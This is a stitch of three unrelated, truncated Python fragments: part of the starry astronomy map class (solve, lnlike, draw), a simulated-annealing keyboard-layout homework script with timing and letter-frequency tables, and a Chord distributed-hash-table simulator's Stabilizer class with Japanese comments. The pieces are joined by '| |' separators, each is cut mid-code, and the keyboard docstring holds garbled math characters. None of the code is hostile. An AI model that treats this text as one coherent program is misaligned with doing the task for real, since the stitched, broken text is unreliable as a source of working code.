self._solution = self._linalg.solve(
X, self._flux, self._C.cholesky, self._mu, self._L.inverse
)
# Set the amplitude and coefficients
x, _ = self._solution
self.amp = x[0]
if self.ydeg > 0:
self[1:, :] = x[1:] / self.amp
# Return the mean and covariance
return self._solution
def lnlike(self, *, design_matrix=None, woodbury=True, **kwargs):
"""Returns the log marginal likelihood of the data given a design matrix.
This method computes the marginal likelihood (marginalized over the
spherical harmonic coefficients) given a
light curve and its covariance (set via the :py:meth:`set_data` method)
and a Gaussian prior on the spherical harmonic coefficients
(set via the :py:meth:`set_prior` method).
Args:
design_matrix (matrix, optional): The flux design matrix, the
quantity returned by :py:meth:`design_matrix`. Default is
None, in which case this is computed based on ``kwargs``.
woodbury (bool, optional): Solve the linear problem using the
Woodbury identity? Default is True. The
`Woodbury identity <https://en.wikipedia.org/wiki/Woodbury_matrix_identity>`_
is used to speed up matrix operations in the case that the
number of data points is much larger than the number of
spherical harmonic coefficients. In this limit, it can
speed up the code by more than an order of magnitude. Keep
in mind that the numerical stability of the Woodbury identity
is not great, so if you're getting strange results try
disabling this. It's also a good idea to disable this in the
limit of few data points and large spherical harmonic degree.
kwargs (optional): Keyword arguments to be passed directly to
:py:meth:`design_matrix`, if a design matrix is not provided.
Returns:
The log marginal likelihood, a scalar.
"""
# Not implemented for spectral
self._no_spectral()
if self._flux is None or self._C is None:
raise ValueError("Please provide a dataset with `set_data()`.")
elif self._mu is None or self._L is None:
raise ValueError("Please provide a prior with `set_prior()`.")
# Get the design matrix & remove any amplitude weighting
if design_matrix is None:
design_matrix = self.design_matrix(**kwargs)
X = self._math.cast(design_matrix)
# Compute the likelihood
if woodbury:
return self._linalg.lnlike_woodbury(
X,
self._flux,
self._C.inverse,
self._mu,
self._L.inverse,
self._C.lndet,
self._L.lndet,
)
else:
return self._linalg.lnlike(
X, self._flux, self._C.value, self._mu, self._L.value
)
@property
def solution(self):
r"""The posterior probability distribution for the map.
This is a tuple containing the mean and lower Cholesky factorization of the
covariance of the amplitude-weighted spherical harmonic coefficient vector,
obtained by solving the regularized least-squares problem
via the :py:meth:`solve` method.
Note that to obtain the actual covariance matrix from the lower Cholesky
factorization :math:`L`, simply compute :math:`L L^\top`.
Note also that this is the posterior for the **amplitude-weighted**
map vector. Under this convention, the map amplitude is equal to the
first term of the vector and the spherical harmonic coefficients are
equal to the vector normalized by the first term.
"""
if self._solution is None:
raise ValueError("Please call `solve()` first.")
return self._solution
def draw(self):
"""Draw a map from the posterior distribution.
This method draws a random map from the posterior distribution and
sets the :py:attr:`y` map vector and :py:attr:`amp` map amplitude
accordingly. Users should call :py:meth:`solve` to enable this
attribute.
"""
if self._solution is None:
raise ValueError("Please call `solve()` first.")
# Fast multivariate sampling using the Cholesky factorization
yhat, cho_ycov = self._solution
u = self._math.cast(np.random.randn(self.Ny))
x = yhat + self._math.dot(cho_ycov, u)
self.amp = x[0]
self[1:, :] = x[1:] / self.amp
class YlmBase(legacy.YlmBase):
"""The default ``starry`` map class.
This class handles light curves and phase curves of objects | |
import random
import pylab
from gurobipy import *
"""
Optimal Keyboard Layout
A standard English keyboard has three rows, with 10, 9 and 7 keys on each. We will label these keys 0, ..., 25, with
keys 0,...,9 on the first row, 10,...,18 on the second row, and 19,...,25 on the third row.
Suppose we know the average time, 𝑡"# , to press key 𝑗 immediately after pressing key 𝑖. For example, if 𝑡&,( = 66
then it takes 66 time units to press the second key (‘W’ on a regular keyboard) after pressing the first key
(‘Q’ on a regular keyboard).
Furthermore, suppose we have data, 𝑓(a, b) , which gives the frequency of each pair of letters (a, b),-
ab in 100,000 pairs of letters in a corpus of text. For example, 𝑓(c, e) = 643 indicates that the ./
pair ‘CE’ occurred 643 times. Thus, if we had assigned ‘C’ to the first key of the keyboard and ‘E’ to the second key,
it would take 643 × 66 = 42438 time units to type the 643 ‘CE’ pairs. From this, the total time taken to type the
100,000 pairs would be
T = sum of t(i, j) 𝑓 p(i) p(j) from i, j = 0 to 25
where 𝑝(𝑘) is the letter assigned to key 𝑘.
A Python stub on Blackboard gives values for 𝑡(i, j) and 𝑓 (a, b)
, along with the function for calculating the total cost for a particular permutation 𝑝(𝑘).
Use simulated annealing to determine an optimal layout for the 26 English letters on the keyboard.
(For comparison, the regular QWERTY keyboard has a total cost of 5,863,759 time units from this data.)
"""
# Time[i][j] gives the time to press key j after pressing key i
Time = [[53, 66, 66, 66, 66, 53, 53, 53, 53, 53, 73, 53, 53, 53, 66, 53, 53, 53, 53, 85, 73, 73, 73, 73, 53, 53],
[66, 53, 66, 66, 66, 53, 53, 53, 53, 53, 53, 73, 53, 53, 66, 53, 53, 53, 53, 73, 85, 73, 73, 73, 53, 53],
[66, 66, 53, 66, 66, 53, 53, 53, 53, 53, 53, 53, 73, 53, 66, 53, 53, 53, 53, 73, 73, 85, 73, 73, 53, 53],
[66, 66, 66, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73, 53, 53, 53, 53, 73, 73, 73, 85, 85, 53, 53],
[66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 53, 73, 53, 53, 53, 53, 73, 73, 73, 85, 85, 53, 53],
[53, 53, 53, 53, 53, 53, 66, 66, 66, 66, 53, 53, 53, 53, 53, 73, 73, 53, 53, 53, 53, 53, 53, 53, 85, 85],
[53, 53, 53, 53, 53, 66, 53, 66, 66, 66, 53, 53, 53, 53, 53, 73, 73, 53, 53, 53, 53, 53, 53, 53, 85, 85],
[53, 53, 53, 53, 53, 66, 66, 53, 66, 66, 53, 53, 53, 53, 53, 66, 53, 73, 53, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 53, 66, 53, 53, 53, 53, 53, 66, 53, 53, 73, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 73, 73, 73, 73, 73, 53, 53],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[53, 53, 53, 53, 53, 66, 66, 66, 66, 66, 53, 53, 53, 53, 53, 66, 53, 53, 53, 53, 53, 53, 53, 53, 73, 73],
[85, 66, 66, 66, 66, 53, 53, 53, 53, 53, 66, 53, 53, 53, 66, 53, 53, 53, 53, 53, 73, 73, 73, 73, 53, 53],
[66, 85, 66, 66, 66, 53, 53, 53, 53, 53, 53, 66, 53, 53, 66, 53, 53, 53, 53, 73, 53, 73, 73, 73, 53, 53],
[66, 66, 85, 66, 66, 53, 53, 53, 53, 53, 53, 53, 66, 53, 66, 53, 53, 53, 53, 73, 73, 53, 73, 73, 53, 53],
[66, 66, 66, 85, 85, 53, 53, 53, 53, 53, 53, 53, 53, 66, 66, 53, 53, 53, 53, 73, 73, 73, 53, 66, 53, 53],
[66, 66, 66, 85, 85, 53, 53, 53, 53, 53, 53, 53, 53, 66, 66, 53, 53, 53, 53, 73, 73, 73, 66, 53, 53, 53],
[53, 53, 53, 53, 53, 85, 85, 66, 66, 66, 53, 53, 53, 53, 53, 66, 66, 53, 53, 53, 53, 53, 53, 53, 53, 66],
[53, 53, 53, 53, 53, 85, 85, 66, 66, 66, 53, 53, 53, 53, 53, 66, 66, 53, 53, 53, 53, 53, 53, 53, 66, 53]]
# Freq[a][b] gives the frequency that the pair of letters ab occurs in 100,000 pairs from a sample of English
Freq = [[4, 224, 348, 391, 18, 92, 240, 18, 453, 9, 138, 1035, 314, 1767, 10, 191, 0, 1058, 897, 1362, 143, 241, 80, 11,
299, 10],
[161, 20, 11, 0, 599, 0, 0, 0, 87, 10, 0, 226, 2, 0, 248, 0, 0, 161, 41, 9, 237, 9, 0, 0, 194, 0],
[426, 4, 79, 4, 643, 3, 0, 565, 261, 2, 127, 164, 1, 0, 901, 0, 1, 156, 12, 375, 106, 0, 0, 1, 45, 0],
[222, 2, 7, 61, 758, 4, 23, 2, 380, 3, 0, 42, 22, 10, 195, 1, 0, 88, 74, 4, 137, 24, 11, 0, 38, 0],
[717, 32, 542, 1148, 410, 194, 119, 26, 166, 11, 28, 506, 373, 1388, 62, 180, 34, 2123, 1306, 367, 36, 253, 140,
194, 147, 3],
[154, 0, 0, 0, 203, 185, 0, 1, 331, 3, 0, 63, 1, 0, 530, 0, 0, 224, 7, 98, 91, 0, 0, 0, 3, 0],
[182, 5, 0, 8, 393, 2, 46, 230, 140, 0, 1, 62, 2, 69, 175, 1, 0, 194, 27, 10, 75, 0, 2, 0, 11, 0],
[1040, 2, 2, 11, 3026, 1, 1, 6, 653, 0, 0, 13, 12, 24, 502, 1, 0, 81, 17, 134, 59, 1, 4, 0, 24, 0],
[263, 85, 678, 348, 341, 133, 233, 8, 7, 1, 48, 532, 266, 2407, 728, 88, 7, 299, 1208, 1109, 13, 256, 1, 22, 5,
40],
[31, 0, 0, 0, 41, 0, 0, 0, 3, 0, 0, 1, 0, 0, 59, 0, 0, 0, 0, 0, 53, 0, 0, 0, 1, 0],
[13, 3, 1, 3, 247, 2, 2, 1, 118, 0, 1, 24, 1, 24, 3, 1, 0, 3, 42, 1, 5, 0, 1, 0, 4, 0],
[587, 6, 15, 325, 876, 46, 26, 2, 615, 2, 16, 657, 21, 6, 321, 18, 0, | |
<filename>chord_sim/modules/stabilizer.py
# coding:utf-8
from typing import Dict, List, Optional, cast, TYPE_CHECKING
import sys
import modules.gval as gval
import traceback
from .chord_util import ChordUtil, KeyValue, NodeIsDownedExceptiopn, AppropriateNodeNotFoundException, \
InternalControlFlowException, DataIdAndValue, ErrorCode, PResult
from .taskqueue import TaskQueue
if TYPE_CHECKING:
from .node_info import NodeInfo
from .chord_node import ChordNode
class Stabilizer:
# join が router.find_successorでの例外発生で失敗した場合にこのクラス変数に格納して次のjoin処理の際にリトライさせる
# なお、本シミュレータの設計上、このフィールドは一つのデータだけ保持できれば良い
need_join_retry_node : Optional['ChordNode'] = None
need_join_retry_tyukai_node: Optional['ChordNode'] = None
def __init__(self, existing_node : 'ChordNode'):
self.existing_node : 'ChordNode' = existing_node
# 自ノードの持っている successor_info_listの deep copy を返す
def pass_successor_list(self) -> List['NodeInfo']:
return [ node_info.get_partial_deepcopy() for node_info in self.existing_node.node_info.successor_info_list]
def pass_predecessor_info(self) -> Optional['NodeInfo']:
if self.existing_node.node_info.predecessor_info != None:
return cast('NodeInfo', self.existing_node.node_info.predecessor_info).get_partial_deepcopy()
else:
return None
# successor_info_listの長さをチェックし、規定長を越えていた場合余剰なノードにレプリカを
# 削除させた上で、リストから取り除く
# TODO: InternalExp at check_successor_list_length
def check_successor_list_length(self) -> PResult[bool]:
if self.existing_node.node_info.lock_of_succ_infos.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
ChordUtil.dprint("check_successor_list_length_0," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "LOCK_ACQUIRE_TIMEOUT")
#raise InternalControlFlowException("gettting lock of succcessor_info_list is timedout.")
return PResult.Err(False, ErrorCode.InternalControlFlowException_CODE)
try:
ChordUtil.dprint(
"check_successor_list_length_1," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ str(len(self.existing_node.node_info.successor_info_list)))
if len(self.existing_node.node_info.successor_info_list) > gval.SUCCESSOR_LIST_NORMAL_LEN:
list_len = len(self.existing_node.node_info.successor_info_list)
delete_elem_list : List['NodeInfo'] = []
for idx in range(gval.SUCCESSOR_LIST_NORMAL_LEN, list_len):
# successor_info_listからエントリが削除された場合、rangeで得られる数字列全てに要素がない
# 状態が起こるため、最新のlengthでチェックし直す
if idx >= len(self.existing_node.node_info.successor_info_list):
break
ChordUtil.dprint(
"check_successor_list_length_2," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[idx])
+ str(len(self.existing_node.node_info.successor_info_list)))
delete_elem_list.append(self.existing_node.node_info.successor_info_list[idx])
# 上のループで削除すると決まった要素を取り除く
for elem in delete_elem_list:
self.existing_node.node_info.successor_info_list.remove(elem)
return PResult.Ok(True)
finally:
self.existing_node.node_info.lock_of_succ_infos.release()
# 経路表の情報を他ノードから強制的に設定する.
# joinメソッドの中で、secondノードがfirstノードに対してのみ用いるものであり、他のケースで利用してはならない
def set_routing_infos_force(self, predecessor_info : 'NodeInfo', successor_info_0 : 'NodeInfo', ftable_enry_0 : 'NodeInfo'):
with self.existing_node.node_info.lock_of_pred_info, self.existing_node.node_info.lock_of_succ_infos:
self.existing_node.node_info.predecessor_info = predecessor_info
self.existing_node.node_info.successor_info_list[0] = successor_info_0
self.existing_node.node_info.finger_table[0] = ftable_enry_0
# node_addressに対応するノードに問い合わせを行い、教えてもらったノードをsuccessorとして設定する
def join(self, node_address : str):
with self.existing_node.node_info.lock_of_pred_info, self.existing_node.node_info.lock_of_succ_infos:
# 実装上例外は発生しない.
# また実システムでもダウンしているノードの情報が与えられることは想定しない
#tyukai_node = ChordUtil.get_node_by_address(node_address)
tyukai_node = cast('ChordNode', ChordUtil.get_node_by_address(node_address).result)
# TODO: x direct access to node_info of tyukai_node at join
ChordUtil.dprint("join_1," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
# try:
# 仲介ノードに自身のsuccessorになるべきノードを探してもらう
# TODO: find_successor call at join
#successor = tyukai_node.endpoints.grpc__find_successor(self.existing_node.node_info.node_id)
ret = tyukai_node.endpoints.grpc__find_successor(self.existing_node.node_info.node_id)
if (ret.is_ok):
successor : 'ChordNode' = cast('ChordNode', ret.result)
# リトライは不要なので、本メソッドの呼び出し元がリトライ処理を行うかの判断に用いる
# フィールドをリセットしておく
Stabilizer.need_join_retry_node = None
else: # ret.err_code == ErrorCode.AppropriateNodeNotFoundException_CODE || ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
# リトライに必要な情報を記録しておく
Stabilizer.need_join_retry_node = self.existing_node
Stabilizer.need_join_retry_tyukai_node = tyukai_node
# 自ノードの情報、仲介ノードの情報
# TODO: x direct access to node_info of tyukai_node at join
ChordUtil.dprint(
"join_2,RETRY_IS_NEEDED," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
return
# except (AppropriateNodeNotFoundException, NodeIsDownedExceptiopn, InternalControlFlowException):
# # リトライに必要な情報を記録しておく
# Stabilizer.need_join_retry_node = self.existing_node
# Stabilizer.need_join_retry_tyukai_node = tyukai_node
#
# # 自ノードの情報、仲介ノードの情報
# # TODO: x direct access to node_info of tyukai_node at join
# ChordUtil.dprint("join_2,RETRY_IS_NEEDED," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
# return
# try:
# TODO: x direct access to node_info of successor at join
self.existing_node.node_info.successor_info_list.append(successor.node_info.get_partial_deepcopy())
# finger_tableのインデックス0は必ずsuccessorになるはずなので、設定しておく
self.existing_node.node_info.finger_table[0] = self.existing_node.node_info.successor_info_list[0].get_partial_deepcopy()
# TODO: x direct access to node_info of tyukai_node at join
if tyukai_node.node_info.node_id == tyukai_node.node_info.successor_info_list[0].node_id:
# secondノードの場合の考慮 (仲介ノードは必ずfirst node)
predecessor = tyukai_node
# 2ノードでsuccessorでもpredecessorでも、チェーン構造で正しい環が構成されるよう強制的に全て設定してしまう
# TODO: x direct access to node_info of predecessor at join
self.existing_node.node_info.predecessor_info = predecessor.node_info.get_partial_deepcopy()
tyukai_node.endpoints.grpc__set_routing_infos_force(
self.existing_node.node_info.get_partial_deepcopy(),
self.existing_node.node_info.get_partial_deepcopy(),
self.existing_node.node_info.get_partial_deepcopy()
)
# tyukai_node.node_info.predecessor_info = self.existing_node.node_info.get_partial_deepcopy()
# tyukai_node.node_info.successor_info_list[0] = self.existing_node.node_info.get_partial_deepcopy()
# # fingerテーブルの0番エントリも強制的に設定する
# tyukai_node.node_info.finger_table[0] = self.existing_node.node_info.get_partial_deepcopy()
# TODO: x direct access to node_info of tyukai_node at join
ChordUtil.dprint("join_3," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(tyukai_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]))
else:
# successorと、successorノードの情報だけ適切なものとする
# TODO: check_predecessor call at join
#successor.endpoints.grpc__check_predecessor(self.existing_node.node_info)
ret2 = successor.endpoints.grpc__check_predecessor(self.existing_node.node_info)
if (ret2.is_ok):
pass
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE
# リトライに必要な情報を記録しておく
Stabilizer.need_join_retry_node = self.existing_node
Stabilizer.need_join_retry_tyukai_node = tyukai_node
# 既に値を設定してしまっている場合を考慮し、内容をリセットしておく
self.existing_node.node_info.successor_info_list = []
# 自ノードの情報、仲介ノードの情報
# TODO: x direct access to node_info of tyukai_node at join
ChordUtil.dprint("join_3,RETRY_IS_NEEDED," + ChordUtil.gen_debug_str_of_node(
self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
ChordUtil.dprint(traceback.format_exc())
return PResult.Err(False, cast(int, ret2.err_code))
# successor_info_listを埋めておく
# TODO: pass_successor_list call at join
succ_list_of_succ: List[NodeInfo] = successor.endpoints.grpc__pass_successor_list()
list_len = len(succ_list_of_succ)
for idx in range(0, gval.SUCCESSOR_LIST_NORMAL_LEN - 1):
if idx < list_len:
self.existing_node.node_info.successor_info_list.append(
succ_list_of_succ[idx].get_partial_deepcopy())
# successorから自身が担当することになるID範囲のデータの委譲を受け、格納する
# TODO: delegate_my_tantou_data call at join
tantou_data_list: List[KeyValue] = successor.endpoints.grpc__delegate_my_tantou_data(
self.existing_node.node_info.node_id)
with self.existing_node.node_info.lock_of_datastore:
for key_value in tantou_data_list:
self.existing_node.data_store.store_new_data(cast(int, key_value.data_id), key_value.value_data)
# 残りのレプリカに関する処理は stabilize処理のためのスレッドに別途実行させる
self.existing_node.tqueue.append_task(TaskQueue.JOIN_PARTIAL)
gval.is_waiting_partial_join_op_exists = True
ChordUtil.dprint_routing_info(self.existing_node, sys._getframe().f_code.co_name)
# except (InternalControlFlowException, NodeIsDownedExceptiopn):
# # リトライに必要な情報を記録しておく
# Stabilizer.need_join_retry_node = self.existing_node
# Stabilizer.need_join_retry_tyukai_node = tyukai_node
#
# # 既に値を設定してしまっている場合を考慮し、内容をリセットしておく
# self.existing_node.node_info.successor_info_list = []
#
# # 自ノードの情報、仲介ノードの情報
# # TODO: x direct access to node_info of tyukai_node at join
# ChordUtil.dprint("join_3,RETRY_IS_NEEDED," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(tyukai_node.node_info))
# ChordUtil.dprint(traceback.format_exc())
# return
# join処理のうちレプリカに関する処理を分割したもの
# stabilize処理を行うスレッドによって一度だけ(失敗した場合はカウントしないとして)実行される
# TODO: InternalExp at partial_join_op
def partial_join_op(self) -> PResult[bool]:
if self.existing_node.node_info.lock_of_pred_info.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
ChordUtil.dprint(
"partial_join_op_0," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "LOCK_ACQUIRE_TIMEOUT")
#raise InternalControlFlowException("gettting lock of predecessor_info is timedout.")
return PResult.Err(False, ErrorCode.InternalControlFlowException_CODE)
if self.existing_node.node_info.lock_of_succ_infos.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
self.existing_node.node_info.lock_of_pred_info.release()
ChordUtil.dprint(
"partial_join_op_2," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "LOCK_ACQUIRE_TIMEOUT")
#raise InternalControlFlowException("gettting lock of succcessor_info_list is timedout.")
return PResult.Err(False, ErrorCode.InternalControlFlowException_CODE)
if self.existing_node.is_alive == False:
# 処理の合間でkillされてしまっていた場合の考慮
# 何もしないで終了する
self.existing_node.node_info.lock_of_succ_infos.release()
self.existing_node.node_info.lock_of_pred_info.release()
ChordUtil.dprint("partial_join_op_2_5," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "REQUEST_RECEIVED_BUT_I_AM_ALREADY_DEAD")
return PResult.Ok(True)
ChordUtil.dprint_routing_info(self.existing_node, sys._getframe().f_code.co_name)
try:
# successor[0] から委譲を受けたデータを successorList 内の全ノードにレプリカとして配る
tantou_data_list : List[DataIdAndValue] = self.existing_node.data_store.get_all_tantou_data()
for node_info in self.existing_node.node_info.successor_info_list:
# try:
#succ : 'ChordNode' = ChordUtil.get_node_by_address(node_info.address_str)
ret = ChordUtil.get_node_by_address(node_info.address_str)
if (ret.is_ok):
succ: 'ChordNode' = cast('ChordNode', ret.result)
ChordUtil.dprint("partial_join_op_3," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(node_info) + "," + str(len(self.existing_node.node_info.successor_info_list)))
# TODO: receive_replica call at partial_join_op
succ.endpoints.grpc__receive_replica(
[DataIdAndValue(data_id = data.data_id, value_data=data.value_data) for data in tantou_data_list]
)
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
# ノードがダウンしていた場合等は無視して次のノードに進む.
# ノードダウンに関する対処とそれに関連したレプリカの適切な配置はそれぞれ stabilize処理 と
# put処理 の中で後ほど行われるためここでは対処しない
# (ただし、レプリカが当該ノードに存在しない状態が短くない時間発生する可能性はある)
ChordUtil.dprint("partial_join_op_4,NODE_IS_DOWNED or InternalControlFlowException,"
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(node_info))
continue
# except (NodeIsDownedExceptiopn, InternalControlFlowException):
# # ノードがダウンしていた場合等は無視して次のノードに進む.
# # ノードダウンに関する対処とそれに関連したレプリカの適切な配置はそれぞれ stabilize処理 と
# # put処理 の中で後ほど行われるためここでは対処しない
# # (ただし、レプリカが当該ノードに存在しない状態が短くない時間発生する可能性はある)
# ChordUtil.dprint("partial_join_op_4,NODE_IS_DOWNED or InternalControlFlowException,"
# + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(node_info))
# continue
def handle_err():
ChordUtil.dprint(
"partial_join_op_6,NODE_IS_DOWNED or InternalControlFlowException" + ChordUtil.gen_debug_str_of_node(
self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(node_info))
# ノードがダウンしていた場合等は無視して先に進む.
# ノードダウンに関する対処とそれに関連したレプリカの適切な配置はそれぞれ stabilize処理 と
# put処理 の中で後ほど行われるためここでは対処しない
# (ただし、レプリカが本ノードに存在しない状態が短くない時間発生する可能性はある)
pass
if self.existing_node.node_info.predecessor_info != None:
# predecessorが非Noneであれば当該ノードの担当データをレプリカとして保持しておかなければならないため
# データを渡してもらい、格納する
self_predecessor_info : NodeInfo = cast('NodeInfo', self.existing_node.node_info.predecessor_info)
# try:
#self_predeessor_node : 'ChordNode' = ChordUtil.get_node_by_address(self_predecessor_info.address_str)
ret = ChordUtil.get_node_by_address(self_predecessor_info.address_str)
if (ret.is_ok):
self_predeessor_node: 'ChordNode' = cast('ChordNode', ret.result)
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
handle_err()
#return PResult.Ok(True)
# TODO: get_all_tantou_data call at partial_join_op
pred_tantou_datas : List[DataIdAndValue] = self_predeessor_node.endpoints.grpc__get_all_tantou_data()
for iv_entry in pred_tantou_datas:
self.existing_node.data_store.store_new_data(iv_entry.data_id,
iv_entry.value_data,
)
ChordUtil.dprint("partial_join_op_5," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self_predeessor_node.node_info) + "," + str(len(pred_tantou_datas)))
# predecessor が非Noneであれば、当該predecessorのsuccessor_info_listの長さが標準を越えてしまって
# いる場合があるため、そのチェックを行う
# (この呼び出しの中で successor_info_listからの余剰ノードのエントリ削除も行われる)
# TODO: check_successor_list_length call at partial_join_op
#self_predeessor_node.endpoints.grpc__check_successor_list_length()
ret2 = self_predeessor_node.endpoints.grpc__check_successor_list_length()
if (ret2.is_ok):
pass
else: # ret2.err_code == ErrorCode.InternalControlFlowException_CODE || ret2.err_code == ErrorCode.NodeIsDownedException_CODE
handle_err()
#return PResult.Ok(True)
# except (NodeIsDownedExceptiopn, InternalControlFlowException):
# ChordUtil.dprint("partial_join_op_6,NODE_IS_DOWNED or InternalControlFlowException" + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(node_info))
# # ノードがダウンしていた場合等は無視して先に進む.
# # ノードダウンに関する対処とそれに関連したレプリカの適切な配置はそれぞれ stabilize処理 と
# # put処理 の中で後ほど行われるためここでは対処しない
# # (ただし、レプリカが本ノードに存在しない状態が短くない時間発生する可能性はある)
# pass
# successorから保持している全てのレプリカを受け取り格納する(successorよりは前に位置することになるため、
# 基本的にsuccessorが保持しているレプリカは自身も全て保持している状態とならなければならない)
# (前方に位置するノードが join や put によるレプリカの配布を行っているタイミングとバッティングするとsuccessorが持っている古い
# データで更新してしまうということが起こる可能性はあるが、タイミングとしては稀であり、また後続の put で再度最新のデータを受け取る
# ため、問題ないと判断する)
# try:
# successor : 'ChordNode' = ChordUtil.get_node_by_address(self.existing_node.node_info.successor_info_list[0].address_str)
ret = ChordUtil.get_node_by_address(self.existing_node.node_info.successor_info_list[0].address_str)
if (ret.is_ok):
successor : 'ChordNode' = cast('ChordNode', ret.result)
# TODO: get_all_data call at partial_join_op
passed_all_replica: List[DataIdAndValue] = successor.endpoints.grpc__get_all_data()
self.existing_node.data_store.store_replica_of_multi_masters(passed_all_replica)
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE || ret.err_code == ErrorCode.NodeIsDownedException_CODE
# ノードがダウンしていた場合等は無視して先に進む.
# ノードダウンに関する対処とそれに関連したレプリカの適切な配置はそれぞれ stabilize処理 と
# put処理 の中で後ほど行われるためここでは対処しない
# (ただし、レプリカが本ノードに存在しない状態が短くない時間発生する可能性はある)
ChordUtil.dprint(
"partial_join_op_7,NODE_IS_DOWNED or InternalControlFlowException" + ChordUtil.gen_debug_str_of_node(
self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(node_info))
# except (NodeIsDownedExceptiopn, InternalControlFlowException):
# # ノードがダウンしていた場合等は無視して先に進む.
# # ノードダウンに関する対処とそれに関連したレプリカの適切な配置はそれぞれ stabilize処理 と
# # put処理 の中で後ほど行われるためここでは対処しない
# # (ただし、レプリカが本ノードに存在しない状態が短くない時間発生する可能性はある)
# ChordUtil.dprint(
# "partial_join_op_7,NODE_IS_DOWNED or InternalControlFlowException" + ChordUtil.gen_debug_str_of_node(
# self.existing_node.node_info) + ","
# + ChordUtil.gen_debug_str_of_node(node_info))
# join処理が全て終わった
self.existing_node.is_join_op_finished = True
# partial_join_opが終わるまで止めていたkillスレッドを解放する
gval.is_waiting_partial_join_op_exists = False
# 自ノードの情報、仲介ノードの情報、successorとして設定したノードの情報
ChordUtil.dprint("partial_join_op_8," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]))
return PResult.Ok(True)
finally:
self.existing_node.node_info.lock_of_succ_infos.release()
self.existing_node.node_info.lock_of_pred_info.release()
# id が自身の正しい predecessor でないかチェックし、そうであった場合、経路表の情報を更新する
# 本メソッドはstabilize処理の中で用いられる
# Attention: InternalControlFlowException を raiseする場合がある
# TODO: InternalExp at check_predecessor
def check_predecessor(self, node_info : 'NodeInfo') -> PResult[bool]:
if self.existing_node.node_info.lock_of_pred_info.acquire(timeout=gval.LOCK_ACQUIRE_TIMEOUT) == False:
ChordUtil.dprint("check_predecessor_0," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ "LOCK_ACQUIRE_TIMEOUT")
#raise InternalControlFlowException("gettting lock of predecessor_info is timedout.")
return PResult.Err(False, ErrorCode.InternalControlFlowException_CODE)
ChordUtil.dprint_routing_info(self.existing_node, sys._getframe().f_code.co_name)
try:
if self.existing_node.node_info.predecessor_info == None:
# predecesorが設定されていなければ無条件にチェックを求められたノードを設定する
